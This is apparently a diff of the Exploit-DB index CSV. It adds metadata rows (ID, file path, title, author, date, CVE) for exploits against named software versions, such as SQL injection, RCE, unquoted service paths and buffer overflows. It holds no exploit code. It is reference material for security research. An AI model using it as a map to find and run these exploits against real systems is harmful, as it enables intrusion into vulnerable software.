8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,,,,,http://www.exploit-db.com269_flatfile_login.zip,
26099,exploits/php/webapps/26099.txt,"FlatNuke 2.5.5 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,webapps,php,,2005-08-05,2013-06-11,1,CVE-2005-2539;OSVDB-18552,,,,,https://www.securityfocus.com/bid/14483/info
26098,exploits/php/webapps/26098.txt,"FlatNuke 2.5.5 - 'structure.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,webapps,php,,2005-08-05,2013-06-11,1,CVE-2005-2539;OSVDB-18551,,,,,https://www.securityfocus.com/bid/14483/info
@ -31696,6 +31712,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28820,exploits/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,webapps,php,,2006-10-17,2013-10-09,1,,,,,,https://www.securityfocus.com/bid/20554/info
36883,exploits/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,webapps,php,,2012-02-26,2015-05-01,1,CVE-2012-1787;OSVDB-79648,,,,,https://www.securityfocus.com/bid/52170/info
18523,exploits/php/webapps/18523.txt,"webgrind 1.0 - 'file' Local File Inclusion",2012-02-25,LiquidWorm,webapps,php,,2012-02-25,2012-03-16,1,OSVDB-80346;CVE-2012-1790,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-03-03-at-31057-pm.png,http://www.exploit-db.comwebgrind-release-1.0.zip,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5075.php
51074,exploits/php/webapps/51074.txt,"Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
50589,exploits/php/webapps/50589.py,"WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)",2021-12-13,"Jeremiasz Pluta",webapps,php,,2021-12-13,2021-12-13,0,CVE-2021-43936,,,,,
50785,exploits/php/webapps/50785.txt,"WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)",2022-02-23,"Antonio Cuomo",webapps,php,,2022-02-23,2022-02-23,0,,,,,,
50784,exploits/php/webapps/50784.py,"WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)",2022-02-23,"Antonio Cuomo",webapps,php,,2022-02-23,2022-02-23,0,,,,,,
@ -31844,6 +31861,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48430,exploits/php/webapps/48430.txt,"webTareas 2.0.p8 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,,2020-05-06,2020-05-06,0,,,,,,
48709,exploits/php/webapps/48709.txt,"Webtareas 2.1p - Arbitrary File Upload (Authenticated)",2020-07-26,AppleBois,webapps,php,,2020-07-26,2020-07-26,0,,,,,,
50893,exploits/php/webapps/50893.py,"WebTareas 2.4 - Blind SQLi (Authenticated)",2022-05-11,"Behrad Taher",webapps,php,,2022-05-11,2022-05-11,0,CVE-2021-43481,,,,,
51089,exploits/php/webapps/51089.txt,"WebTareas 2.4 - RCE (Authorized)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
51088,exploits/php/webapps/51088.txt,"WebTareas 2.4 - Reflected XSS (Unauthorised)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
51087,exploits/php/webapps/51087.txt,"WebTareas 2.4 - SQL Injection (Unauthorised)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,,2020-04-13,2020-04-13,0,,,,,,
29602,exploits/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' SQL Injection",2007-02-14,"Moran Zavdi",webapps,php,,2007-02-14,2017-01-04,1,CVE-2007-0970;OSVDB-33203,,,,,https://www.securityfocus.com/bid/22559/info
28995,exploits/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,webapps,php,80,2013-10-16,2013-10-16,1,OSVDB-98611;OSVDB-98610;OSVDB-98609;OSVDB-98608,,,,http://www.exploit-db.comwebtester5.zip,
@ -33407,6 +33427,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
7170,exploits/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing",2008-11-20,G4N0K,webapps,php,,2008-11-19,2017-01-06,1,OSVDB-50537;CVE-2008-5221,,,,http://www.exploit-db.comwPortfolio.zip,
7165,exploits/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,webapps,php,,2008-11-18,2016-09-25,1,OSVDB-50493;CVE-2008-5220,,,,http://www.exploit-db.comwPortfolio.zip,
15075,exploits/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,webapps,php,,2010-09-21,2010-09-21,1,CVE-2010-3608;OSVDB-68208;OSVDB-68207,,,,http://www.exploit-db.comquiz.zip,
@ -34020,6 +34041,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14359,exploits/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,webapps,php,,2010-07-14,2010-07-14,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14359.png,http://www.exploit-db.comzenphoto-1.3.tar.gz,
9166,exploits/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)",2009-07-16,petros,webapps,php,,2009-07-15,,1,OSVDB-55922;CVE-2009-4563;OSVDB-55921;CVE-2009-4562,,,,,
48633,exploits/php/webapps/48633.py,"ZenTao Pro 8.8.2 - Command Injection",2020-07-02,"Daniel Monzón",webapps,php,,2020-07-02,2020-07-02,0,,,,,,
51069,exploits/php/webapps/51069.txt,"Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)",2023-03-27,mister0xf,webapps,php,,2023-03-27,2023-03-27,0,,,,,,
22750,exploits/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion",2003-06-06,farking,webapps,php,,2003-06-06,2012-11-16,1,OSVDB-4554,,,,,https://www.securityfocus.com/bid/7843/info
11850,exploits/php/webapps/11850.txt,"Zephyrus CMS - 'index.php' SQL Injection",2010-03-23,Phenom,webapps,php,,2010-03-22,,1,,,,,,
982,exploits/php/webapps/982.c,"ZeroBoard - Worm Source Code",2005-05-06,anonymous,webapps,php,,2005-05-05,2017-10-25,1,,,,,,
@ -34085,6 +34107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17593,exploits/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,webapps,php,,2011-08-01,2013-12-09,0,OSVDB-74198;CVE-2013-0332,,,,,
41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",webapps,php,80,2017-02-03,2017-02-03,0,,,,,http://www.exploit-db.comZoneMinder-1.30.0.tar.gz,https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,,2019-07-01,2019-07-03,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comzoneminder-1.32.3.tar.gz,
51071,exploits/php/webapps/51071.py,"Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass",2023-03-27,"Trenches of IT",webapps,php,,2023-03-27,2023-03-27,0,CVE-2022-39291;CVE-2022-39290;CVE-2022-39285,,,,,
2142,exploits/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",webapps,php,,2006-08-06,,1,OSVDB-27775;CVE-2006-4036,,,,,
29091,exploits/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution",2013-10-20,"Halim Cruzito",webapps,php,,2013-10-23,2013-10-23,1,CVE-2011-4275;CVE-2009-4140;OSVDB-59051,,,,http://www.exploit-db.comzonPHPv225.zip,
49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,,
@ -34461,6 +34484,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1624,exploits/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) - rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",local,tru64,,2006-03-28,2017-01-24,1,,,,,,
4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,,
51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,,
19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info
698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,,
22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,dos,unix,,2002-12-04,2016-12-19,1,CVE-2002-2272;OSVDB-7394,,,,,https://www.securityfocus.com/bid/6320/info
@ -35912,6 +35936,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3898,exploits/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - 'hpqvwocx.dll' ActiveX Magview Overflow (PoC)",2007-05-11,callAX,dos,windows,,2007-05-10,,1,OSVDB-37787;CVE-2007-2656,,,,,
7592,exploits/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)",2008-12-28,Encrypt3d.M!nd,dos,windows,,2008-12-27,,1,OSVDB-50990;CVE-2008-5756,,,,,
7962,exploits/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,dos,windows,,2009-02-02,,1,,,,,,
51080,exploits/windows/dos/51080.txt,"Hex Workshop v6.7 - Buffer overflow DoS",2023-03-27,"Rafael Pedrero",dos,windows,,2023-03-27,2023-03-27,0,,,,,,
4344,exploits/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)",2007-08-30,rgod,dos,windows,,2007-08-29,,1,OSVDB-40171;CVE-2007-4646,,,,,
20307,exploits/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",dos,windows,,2000-10-18,2012-08-07,1,CVE-2000-0991;OSVDB-1616,,,,,https://www.securityfocus.com/bid/1815/info
18188,exploits/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",dos,windows,,2011-12-02,2011-12-03,1,OSVDB-77449;CVE-2011-4720,,,http://www.exploit-db.com/screenshots/idlt18500/18188.png,http://www.exploit-db.comhs_tftp_demo.exe,http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
@ -37901,6 +37926,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21792,exploits/windows/dos/21792.txt,"Savant Web Server 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",dos,windows,,2002-09-13,2012-10-07,1,CVE-2002-1828;OSVDB-16592,,,,,https://www.securityfocus.com/bid/5707/info
23191,exploits/windows/dos/23191.txt,"Savant Web Server 3.1 - Page Redirect Denial of Service",2003-09-26,"Phuong Nguyen",dos,windows,,2003-09-26,2012-12-06,1,,,,,,https://www.securityfocus.com/bid/8712/info
7578,exploits/windows/dos/7578.pl,"SAWStudio 3.9i - '.prf' Local Buffer Overflow (PoC)",2008-12-24,Encrypt3d.M!nd,dos,windows,,2008-12-23,,1,OSVDB-51025;CVE-2008-5722,,,,,
51081,exploits/windows/dos/51081.txt,"Scdbg 1.0 - Buffer overflow DoS",2023-03-27,"Rafael Pedrero",dos,windows,,2023-03-27,2023-03-27,0,,,,,,
24474,exploits/windows/dos/24474.py,"Schneider Electric Accutech Manager - Heap Overflow (PoC)",2013-02-10,"Evren Yalçın",dos,windows,,2013-02-10,2013-02-10,1,CVE-2013-0658;OSVDB-89691,,,,,
44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,,2018-05-03,2018-05-03,0,,,,,,https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine
9133,exploits/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,dos,windows,,2009-07-12,,1,OSVDB-59735;CVE-2009-3857,,,,,
@ -38138,6 +38164,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,,2020-01-20,2020-01-20,0,,,,,,
24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",dos,windows,,2013-04-09,2013-04-09,1,OSVDB-92081,,,,http://www.exploit-db.comsysaxserv_setup_6.10.msi,
38014,exploits/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,dos,windows,22,2015-08-29,2015-08-29,0,OSVDB-126848,,,,http://www.exploit-db.comsysaxserv_setup.msi,
51066,exploits/windows/dos/51066.txt,"Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)",2023-03-27,"Luis Martínez",dos,windows,,2023-03-27,2023-03-27,0,,,,,,
13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities",2010-06-21,leinakesi,dos,windows,,2010-06-20,2010-06-22,1,OSVDB-65769;OSVDB-65768,,,http://www.exploit-db.com/screenshots/idlt14000/13958.png,http://www.exploit-db.comsysaxserv_setup.msi,
44372,exploits/windows/dos/44372.py,"SysGauge 4.5.18 - Local Denial of Service",2018-03-30,"Hashim Jawad",dos,windows,,2018-03-30,2018-03-30,0,,,,,http://www.exploit-db.comsysgauge_setup_v4.5.18.exe,
43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,,2017-12-27,2017-12-27,1,CVE-2017-15667,,,http://www.exploit-db.com/screenshots/idlt43500/screen-shot-2017-12-27-at-210224.png,http://www.exploit-db.comsysgaugesrv_setup_v3.6.18.exe,
@ -38977,6 +39004,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18096,exploits/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Local Stack Buffer Overflow",2011-11-09,modpr0be,local,windows,,2011-11-09,2011-11-13,1,OSVDB-77043,,,http://www.exploit-db.com/screenshots/idlt18500/screen-shot-2011-11-13-at-73701-am.png,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
40741,exploits/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,local,windows,,2016-11-08,2016-11-08,0,,,,,,
29125,exploits/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",local,windows,,2013-10-22,2013-10-23,1,OSVDB-98976;OSVDB-98971,,,,,
51090,exploits/windows/local/51090.py,"AVS Audio Converter 10.3 - Stack Overflow (SEH)",2023-03-27,"Yehia Elghaly",local,windows,,2023-03-27,2023-03-27,0,,,,,,
47788,exploits/windows/local/47788.py,"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow",2019-12-18,ZwX,local,windows,,2019-12-18,2019-12-18,0,,,,,,
47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,,2019-12-30,2019-12-30,0,,,,,,
46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,,2019-05-24,2019-05-24,0,,Local,,,http://www.exploit-db.comaxessh.exe,
@ -39424,6 +39452,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
844,exploits/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (ASM)",2005-02-26,illwill,local,windows,,2005-02-25,,1,OSVDB-14139;CVE-2005-0518,,,,,
8270,exploits/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,local,windows,,2009-03-22,,1,OSVDB-52868;CVE-2009-1063,,,,,
48965,exploits/windows/local/48965.txt,"Exploit - EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path",2020-10-28,"İsmail Önder Kaya",local,windows,,2020-10-28,2020-10-28,0,,,,,,
51077,exploits/windows/local/51077.txt,"Explorer32++ v1.3.5.531 - Buffer overflow",2023-03-27,"Rafael Pedrero",local,windows,,2023-03-27,2023-03-27,0,,,,,,
39674,exploits/windows/local/39674.py,"Express Zip 2.40 - Directory Traversal",2016-04-08,R-73eN,local,windows,,2016-04-08,2016-04-08,0,,,,,http://www.exploit-db.comzipplus.exe,
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,,2021-03-24,2021-03-24,0,,,,,,
15994,exploits/windows/local/15994.rb,"eXtremeMP3 Player - Local Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",local,windows,,2011-01-15,2011-01-15,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15994.png,http://www.exploit-db.comxtremv20RC1.exe,
@ -39515,6 +39544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,,2021-03-09,2021-03-09,0,,,,,,
48044,exploits/windows/local/48044.txt,"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeSSHd.exe,
3798,exploits/windows/local/3798.c,"FreshView 7.15 - '.psp' Local Buffer Overflow",2007-04-25,Marsu,local,windows,,2007-04-24,,1,OSVDB-35385;CVE-2007-2283,,,,,
51078,exploits/windows/local/51078.txt,"Frhed (Free hex editor) v1.6.0 - Buffer overflow",2023-03-27,"Rafael Pedrero",local,windows,,2023-03-27,2023-03-27,0,,,,,,
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,,2020-05-04,2020-05-04,0,,,,,,
48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,,2020-06-08,2020-06-08,0,,,,,,
48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,,2020-06-11,2020-06-11,0,,,,,,
@ -39547,6 +39577,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
50449,exploits/windows/local/50449.txt,"Gestionale Open 11.00.00 - Local Privilege Escalation",2021-10-25,"Alessandro Salzano",local,windows,,2021-10-25,2021-10-25,0,,,,,,
51065,exploits/windows/local/51065.txt,"Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path",2023-03-27,"Luis Martínez",local,windows,,2023-03-27,2023-03-27,0,,,,,,
17196,exploits/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - 'ElonFmt.ocx' pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,local,windows,,2011-04-21,2011-06-23,1,,,,http://www.exploit-db.com/screenshots/idlt17500/elonfmt.png,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php
912,exploits/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,local,windows,,2005-04-03,2017-11-22,1,OSVDB-15210;CVE-2005-1098,,,,,
41221,exploits/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,local,windows,,2017-02-02,2017-02-02,0,,,,,http://www.exploit-db.comgs920w32.exe,
@ -39888,6 +39919,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41971,exploits/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,local,windows,,2017-05-08,2017-08-24,1,CVE-2017-8869,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-140354.png,http://www.exploit-db.comMediaCoder-0.8.48.5888.exe,
17012,exploits/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow",2011-03-20,"Oh Yaw Theng",local,windows,,2011-03-20,2011-03-20,1,,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-03-20-at-64132-am.png,http://www.exploit-db.comMediaCoder2011-RC3-5072.exe,
26404,exploits/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Local Buffer Overflow",2013-06-24,metacom,local,windows,,2013-06-24,2013-06-24,0,OSVDB-94522,,,,,
51064,exploits/windows/local/51064.txt,"Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path",2023-03-27,"Luis Martínez",local,windows,,2023-03-27,2023-03-27,0,,,,,,
49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
46437,exploits/windows/local/46437.txt,"Memu Play 6.0.7 - Privilege Escalation",2019-02-21,"Alejandra Sánchez",local,windows,,2019-02-21,2020-02-05,1,,Local,,,http://www.exploit-db.comMemu-Installer.exe,
48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,,2020-04-06,2020-04-06,0,,,,,,
@ -40714,6 +40746,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,,2020-05-13,2020-05-13,0,,,,,,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",2021-09-03,"Salman Asad",local,windows,,2021-09-03,2022-08-01,0,,,,,,
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,,2021-06-21,2022-08-01,1,CVE-2021-35448,,,,http://www.exploit-db.comRemoteMouse.exe,
51079,exploits/windows/local/51079.txt,"Resource Hacker v3.6.0.92 - Buffer overflow",2023-03-27,"Rafael Pedrero",local,windows,,2023-03-27,2023-03-27,0,,,,,,
44516,exploits/windows/local/44516.py,"RGui 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,,2018-04-24,2018-06-04,0,,,,,http://www.exploit-db.comR-3.4.4-win.exe,
46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,,2019-01-10,2019-01-10,0,,Local,,,http://www.exploit-db.comR-3.5.0-win.exe,
46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,,2019-01-10,2019-01-10,0,,"Buffer Overflow",,,http://www.exploit-db.comR-3.5.0-win.exe,
@ -40927,6 +40960,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9047,exploits/windows/local/9047.pl,"TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",local,windows,,2009-06-29,,1,OSVDB-55507;CVE-2009-2566,,,,,
49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,,2021-05-10,2021-05-10,0,,,,,,
48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,,2020-02-17,2020-02-17,0,,,,,,
51076,exploits/windows/local/51076.txt,"Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path",2023-03-27,"Ismael Nava",local,windows,,2023-03-27,2023-03-27,0,,,,,,
50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,,2021-06-14,2021-06-14,0,,,,,http://www.exploit-db.comTftpd64-4.64-setup.exe,
17383,exploits/windows/local/17383.py,"The KMPlayer 3.0.0.1440 (Windows 7) - '.mp3' Local Buffer Overflow (ASLR Bypass)",2011-06-11,xsploitedsec,local,windows,,2011-06-11,2011-06-12,1,OSVDB-72862,,,,,
17364,exploits/windows/local/17364.py,"The KMPlayer 3.0.0.1440 (Windows XP SP3) - '.mp3' File Buffer Overflow (DEP Bypass)",2011-06-06,"dookie & ronin",local,windows,,2011-06-06,2011-06-06,1,OSVDB-72862,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-06-06-at-62958-am.png,,
@ -44741,6 +44775,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1357,exploits/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow",2005-12-04,"Kevin Finisterre",remote,windows,,2005-12-03,,1,OSVDB-22800;CVE-2005-4417,,,,,
49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,,2021-03-01,2021-11-30,1,,,,,,
50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",2022-07-01,RedHatAugust,remote,windows,,2022-07-01,2022-07-01,1,,,,,http://www.exploit-db.comMouseServer.exe,
51072,exploits/windows/remote/51072.py,"WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)",2023-03-27,Payal,remote,windows,,2023-03-27,2023-03-27,0,,,,,,
